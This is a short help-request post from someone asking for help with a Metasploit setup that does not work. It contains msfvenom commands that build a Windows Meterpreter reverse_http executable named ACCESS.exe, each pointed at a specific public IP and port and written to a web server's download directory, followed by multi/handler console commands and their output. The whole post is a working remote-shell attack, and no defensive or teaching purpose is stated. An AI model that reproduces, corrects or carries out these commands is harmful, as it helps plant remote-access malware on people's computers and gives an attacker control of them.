SIR THIS IS HOW I RUN THE METASPLOIT BELOW BUT IT DID NOT WORK AND ALSO THE RESULT IN SCREENSHOT IF THERE’S ANY MISTAKE PLEASE CORRECT ME THANKS.
msfvenom -p windows/meterpreter/reverse_http LHOST=143.244.38.61 LPORT=443 -f exe -o /var/www/html/ACCESS.exe
msfvenom -p windows/meterpreter/reverse_http LHOST=143.244.36.79 LPORT=42338 -f exe -o /var/www/html/ACCESS.exe
msfvenom -p windows/meterpreter/reverse_http LHOST=47.31.201.92 LPORT=42338 -f exe -o /var/www/html/ACCESS.exe
………………………………………………………………………………………………..
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_http
set LHOST 143.244.38.61
set LPORT 443 and also I tried set LPORT 80
Result Below…..
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_http
PAYLOAD => windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set LHOST 143.244.38.61
LHOST => 143.244.38.61
msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf6 exploit(multi/handler) > exploit
[-] Handler failed to bind to 143.244.38.61:443
[*] Started HTTP reverse handler on http://0.0.0.0:443